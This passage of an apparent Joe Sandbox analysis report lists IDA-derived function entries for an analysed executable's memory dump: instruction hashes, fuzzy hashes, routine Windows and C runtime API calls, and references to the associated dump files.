                                                                                          • Instruction ID: a7086a524831d47be4d6c5f9df92217256b01ef14650c19bd25e77be1d3bb460
                                                                                          • Opcode Fuzzy Hash: be5e5485aaaa32f6ee7b35d072c2ebe4f7ee91f91dd3a63a17e95c313c3abca4
                                                                                          • Instruction Fuzzy Hash: D901137250121DBBCF03AF95DC06DEE7F66EF08710F014214FE0825260CA329A31EB90
                                                                                          APIs
                                                                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,003E709A), ref: 003E79F2
                                                                                          Strings
                                                                                          • InitializeCriticalSectionEx, xrefs: 003E79C2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: CountCriticalInitializeSectionSpin
                                                                                          • String ID: InitializeCriticalSectionEx
                                                                                          • API String ID: 2593887523-3084827643
                                                                                          • Opcode ID: c3a1bb767f5c12111484236a642298f9c1f426895443e9fe3de363cd77a5b772
                                                                                          • Instruction ID: 6390bdaa81d5c3729943245121e287226437c3c184ead5144eec0130082a58e8
                                                                                          • Opcode Fuzzy Hash: c3a1bb767f5c12111484236a642298f9c1f426895443e9fe3de363cd77a5b772
                                                                                          • Instruction Fuzzy Hash: F3F0B47564521CBBCB076F55DC06CBE7FA5DF04710F404254FD185A261DA715E10E7D0
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: Alloc
                                                                                          • String ID: FlsAlloc
                                                                                          • API String ID: 2773662609-671089009
                                                                                          • Opcode ID: b6e46c7b5c9b42f624d8efc9a0c199a8f631f3ec1aabd921578e6ba73e7ee8df
                                                                                          • Instruction ID: f88ea3082356dea5d81f7d3b976774498f2b87e001c787fb87934274f3d81ce2
                                                                                          • Opcode Fuzzy Hash: b6e46c7b5c9b42f624d8efc9a0c199a8f631f3ec1aabd921578e6ba73e7ee8df
                                                                                          • Instruction Fuzzy Hash: 16E05575B45228BB830BBF69AC0A9BEBB98CF44720F400264FD0466381DD701E00C2C5
                                                                                          APIs
                                                                                          • try_get_function.LIBVCRUNTIME ref: 003E1DAF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: try_get_function
                                                                                          • String ID: FlsAlloc
                                                                                          • API String ID: 2742660187-671089009
                                                                                          • Opcode ID: edc0417d0cba635f2d2aadc8c1c02b5aca351282a6050aaa99670ef1dabf95fe
                                                                                          • Instruction ID: 61430c9104d8a73d4e8b6e71f49aecd912cc9fd240cbb511940110342a8ecc30
                                                                                          • Opcode Fuzzy Hash: edc0417d0cba635f2d2aadc8c1c02b5aca351282a6050aaa99670ef1dabf95fe
                                                                                          • Instruction Fuzzy Hash: 5FD05B36B8227CE6991336D5BC029FA7E588B00BB1F040152FF0865282D5B1445055D1
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 003DCD6E
                                                                                            • Part of subcall function 003DCABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003DCB39
                                                                                            • Part of subcall function 003DCABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003DCB4A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID: 3uo
                                                                                          • API String ID: 1269201914-2184686533
                                                                                          • Opcode ID: 0ab94baead0aaa55a4f62bc099e0741e44cca9946e93920eb30a6b191f863fc1
                                                                                          • Instruction ID: 4901388c98b92fae981f71e62f6a6d2106efdee96b3fca001124a64af4694419
                                                                                          • Opcode Fuzzy Hash: 0ab94baead0aaa55a4f62bc099e0741e44cca9946e93920eb30a6b191f863fc1
                                                                                          • Instruction Fuzzy Hash: E5B092CA2B900ABD252BA2446E02C37010DC080F50321506BF501D8250E8400806C032
                                                                                          APIs
                                                                                            • Part of subcall function 003E81EB: GetOEMCP.KERNEL32(00000000,?,?,003E8474,?), ref: 003E8216
                                                                                          • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,003E84B9,?,00000000), ref: 003E868C
                                                                                          • GetCPInfo.KERNEL32(00000000,003E84B9,?,?,?,003E84B9,?,00000000), ref: 003E869F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: CodeInfoPageValid
                                                                                          • String ID:
                                                                                          • API String ID: 546120528-0
                                                                                          • Opcode ID: 47220bed481ed49eed65a612ed7c26ff02c84cc160354daf4117526a7289fc3b
                                                                                          • Instruction ID: 712208ec06f299e75062880fe7941b2952155a130b98e5039020e29f9973d35d
                                                                                          • Opcode Fuzzy Hash: 47220bed481ed49eed65a612ed7c26ff02c84cc160354daf4117526a7289fc3b
                                                                                          • Instruction Fuzzy Hash: 7F515575D006A59EDB238F37C8856BABBE5EF40310F24466ED09E8B2D1DF359942CB90
                                                                                          APIs
                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 003D2112
                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 003D2135
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: Exception@8Throw
                                                                                          • String ID:
                                                                                          • API String ID: 2005118841-0
                                                                                          • Opcode ID: 0f0b6c252a21f04a24c2b2754d29d49201b5acffd0879fa574071921b8e3dacd
                                                                                          • Instruction ID: ef50f159123874cf09fb629f0f74d9ab84f6e96c754417b7bd4b557c7a57cca8
                                                                                          • Opcode Fuzzy Hash: 0f0b6c252a21f04a24c2b2754d29d49201b5acffd0879fa574071921b8e3dacd
                                                                                          • Instruction Fuzzy Hash: D14106B6609386AFD32ADF34E484BABFBD4BB64304F00061FE65857342D7719858C7A2
                                                                                          APIs
                                                                                          • __EH_prolog.LIBCMT ref: 003C1383
                                                                                            • Part of subcall function 003C5FB1: __EH_prolog.LIBCMT ref: 003C5FB6
                                                                                            • Part of subcall function 003CC413: __EH_prolog.LIBCMT ref: 003CC418
                                                                                            • Part of subcall function 003CC413: new.LIBCMT ref: 003CC45B
                                                                                            • Part of subcall function 003CC413: new.LIBCMT ref: 003CC47F
                                                                                          • new.LIBCMT ref: 003C13FB
                                                                                            • Part of subcall function 003CAC66: __EH_prolog.LIBCMT ref: 003CAC6B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog
                                                                                          • String ID:
                                                                                          • API String ID: 3519838083-0
                                                                                          • Opcode ID: 34b7b6917404389e6bd65908da70850673440082afa8cbc6e615531e566f3556
                                                                                          • Instruction ID: eb1daa592f319e5de693018b12e34497ae7c8b0e371f51ad948d77e7f3ae95f1
                                                                                          • Opcode Fuzzy Hash: 34b7b6917404389e6bd65908da70850673440082afa8cbc6e615531e566f3556
                                                                                          • Instruction Fuzzy Hash: 464115B0805B40DED725DF7A8885AE6FBE5FB19300F50492ED5EEC7282CB326554CB15
                                                                                          APIs
                                                                                          • __EH_prolog.LIBCMT ref: 003C1383
                                                                                            • Part of subcall function 003C5FB1: __EH_prolog.LIBCMT ref: 003C5FB6
                                                                                            • Part of subcall function 003CC413: __EH_prolog.LIBCMT ref: 003CC418
                                                                                            • Part of subcall function 003CC413: new.LIBCMT ref: 003CC45B
                                                                                            • Part of subcall function 003CC413: new.LIBCMT ref: 003CC47F
                                                                                          • new.LIBCMT ref: 003C13FB
                                                                                            • Part of subcall function 003CAC66: __EH_prolog.LIBCMT ref: 003CAC6B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog
                                                                                          • String ID:
                                                                                          • API String ID: 3519838083-0
                                                                                          • Opcode ID: 8e6f298ba17850a8daa3003240fd26c254ff2ac549342cc3a653317a210ea47b
                                                                                          • Instruction ID: 86a8c090db2f30a02570cb2259f91c89d315f0e98a15079019c21051e0ee71f0
                                                                                          • Opcode Fuzzy Hash: 8e6f298ba17850a8daa3003240fd26c254ff2ac549342cc3a653317a210ea47b
                                                                                          • Instruction Fuzzy Hash: B04124B0805B40DED726DF7A8485AE6FBE5FF29300F504A2ED5EE87282CB726554CB11
                                                                                          APIs
                                                                                            • Part of subcall function 003E631F: GetLastError.KERNEL32(?,003FCBE8,003E2674,003FCBE8,?,?,003E2213,?,?,003FCBE8), ref: 003E6323
                                                                                            • Part of subcall function 003E631F: _free.LIBCMT ref: 003E6356
                                                                                            • Part of subcall function 003E631F: SetLastError.KERNEL32(00000000,?,003FCBE8), ref: 003E6397
                                                                                            • Part of subcall function 003E631F: _abort.LIBCMT ref: 003E639D
                                                                                            • Part of subcall function 003E8576: _abort.LIBCMT ref: 003E85A8
                                                                                            • Part of subcall function 003E8576: _free.LIBCMT ref: 003E85DC
                                                                                            • Part of subcall function 003E81EB: GetOEMCP.KERNEL32(00000000,?,?,003E8474,?), ref: 003E8216
                                                                                          • _free.LIBCMT ref: 003E84CF
                                                                                          • _free.LIBCMT ref: 003E8505
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: _free$ErrorLast_abort
                                                                                          • String ID:
                                                                                          • API String ID: 2991157371-0
                                                                                          • Opcode ID: 54c3d4e5495114ede50ea49c04ff1e625625cbf021596d124aeb8fb0d305370f
                                                                                          • Instruction ID: 62eefb88d2eba670c67acfdc978b1c48c406ae924dd8586508b658e5f9bff861
                                                                                          • Opcode Fuzzy Hash: 54c3d4e5495114ede50ea49c04ff1e625625cbf021596d124aeb8fb0d305370f
                                                                                          • Instruction Fuzzy Hash: E131C131D046A9AFDB12EB6BC441AAD77E8EF41324F264299F4089B2D2DF315D40CB10
                                                                                          APIs
                                                                                          • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,003C9B87,?,?,003C7735), ref: 003C9579
                                                                                          • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,003C9B87,?,?,003C7735), ref: 003C95AE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateFile
                                                                                          • String ID:
                                                                                          • API String ID: 823142352-0
                                                                                          • Opcode ID: 336d356c58125863669755db2a3e8abe2fe8eac2554b982bb6ab6a646dfda600
                                                                                          • Instruction ID: eba748540b62c934628d463062292a530dfe1a18b93d6ed515809827dc83ec09
                                                                                          • Opcode Fuzzy Hash: 336d356c58125863669755db2a3e8abe2fe8eac2554b982bb6ab6a646dfda600
                                                                                          • Instruction Fuzzy Hash: 9521F0B1000748AFE7328F14C849FA7B7ECEB0A764F01492EF4E5C6591C674AC49CB60
                                                                                          APIs
                                                                                          • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,?,003C7436,?,?,?), ref: 003C9A2C
                                                                                          • SetFileTime.KERNELBASE(?,?,?,?), ref: 003C9ADC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$BuffersFlushTime
                                                                                          • String ID:
                                                                                          • API String ID: 1392018926-0
                                                                                          • Opcode ID: a5bf830c27eb7a24ff88efce3ab6d4d326d94535e9870e5d8a8fd09e1c0fc942
                                                                                          • Instruction ID: d18ef8a6e44ba6aaf8f6b8685de47be8999c10b230a03aad16a3cf1a67428aa4
                                                                                          • Opcode Fuzzy Hash: a5bf830c27eb7a24ff88efce3ab6d4d326d94535e9870e5d8a8fd09e1c0fc942
                                                                                          • Instruction Fuzzy Hash: 5A21D335158385AFC716DE24C889FBABBD8AF96704F06091EF8C1C7181D729ED08C751
                                                                                          APIs
                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 003E7795
                                                                                          • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 003E77A2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressProc__crt_fast_encode_pointer
                                                                                          • String ID:
                                                                                          • API String ID: 2279764990-0
                                                                                          • Opcode ID: fec8505cc7007034116bae64a69b4f1e319c6e3bd4eb4bedb5ad4af9576741dc
                                                                                          • Instruction ID: 585fb6fd891eb7edabc3411b8de73c5aca018a8aa4264388221092187e75c72b
                                                                                          • Opcode Fuzzy Hash: fec8505cc7007034116bae64a69b4f1e319c6e3bd4eb4bedb5ad4af9576741dc
                                                                                          • Instruction Fuzzy Hash: E3110A376046719B9B23DE2AEC819BA7399AB84720F174320FD15AB2D4D631EC4187D1
                                                                                          APIs
                                                                                          • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 003C9B21
                                                                                          • GetLastError.KERNEL32 ref: 003C9B2D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorFileLastPointer
                                                                                          • String ID:
                                                                                          • API String ID: 2976181284-0
                                                                                          • Opcode ID: 07a969bbd48ed5fd5ec320d995bec40192bd68c4157afa4f60f87c6872c4607e
                                                                                          • Instruction ID: 68093c1b8f6bf3c3e5c5810c7448763534240a06992447afa844424ca70fb7c3
                                                                                          • Opcode Fuzzy Hash: 07a969bbd48ed5fd5ec320d995bec40192bd68c4157afa4f60f87c6872c4607e
                                                                                          • Instruction Fuzzy Hash: F5018CB07052046BEB3AAA29EC49B6AB6D99B84314F16457FB152C7680CA31DC08C721
                                                                                          APIs
                                                                                          • SetFilePointer.KERNELBASE(000000FF,?,?,?), ref: 003C98EB
                                                                                          • GetLastError.KERNEL32 ref: 003C98F8
                                                                                            • Part of subcall function 003C96AA: __EH_prolog.LIBCMT ref: 003C96AF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorFileH_prologLastPointer
                                                                                          • String ID:
                                                                                          • API String ID: 4236474358-0
                                                                                          • Opcode ID: cdfb678453e64eaabc3d40da011a51b20e1443787f87a5bb05332e06c6d14a3d
                                                                                          • Instruction ID: 64f2eeb24ba8a8cadc8974e83822933f6edb30a6dce283524ccd60b42f8b76a2
                                                                                          • Opcode Fuzzy Hash: cdfb678453e64eaabc3d40da011a51b20e1443787f87a5bb05332e06c6d14a3d
                                                                                          • Instruction Fuzzy Hash: 1901B13360030A9B8F1A8E598C4CFBA7759AF46730717422FE936CB291DB30DC118760
                                                                                          APIs
                                                                                          • _free.LIBCMT ref: 003E5B0B
                                                                                            • Part of subcall function 003E59FC: RtlAllocateHeap.NTDLL(00000000,?,?,?,003E23AA,?,0000015D,?,?,?,?,003E2F29,000000FF,00000000,?,?), ref: 003E5A2E
